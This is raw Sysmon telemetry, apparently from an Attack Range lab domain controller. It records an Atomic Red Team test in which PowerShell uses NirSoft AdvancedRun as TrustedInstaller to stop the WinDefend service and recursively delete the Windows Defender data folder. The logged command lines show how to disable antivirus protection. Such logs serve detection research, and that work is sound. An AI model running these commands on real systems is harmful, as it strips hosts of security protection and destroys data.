10341000x80000000000000003983652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003983651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8004-000000002702}592640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003983649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.309{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F46C-61EA-8004-000000002702}592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003983648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003983645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8004-000000002702}592640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003983643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.305{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F46C-61EA-8004-000000002702}592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003983392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.069{834264DD-F46C-61EA-8004-000000002702}592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003983272Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 534500x80000000000000003983271Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003983270Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983269Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983268Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\W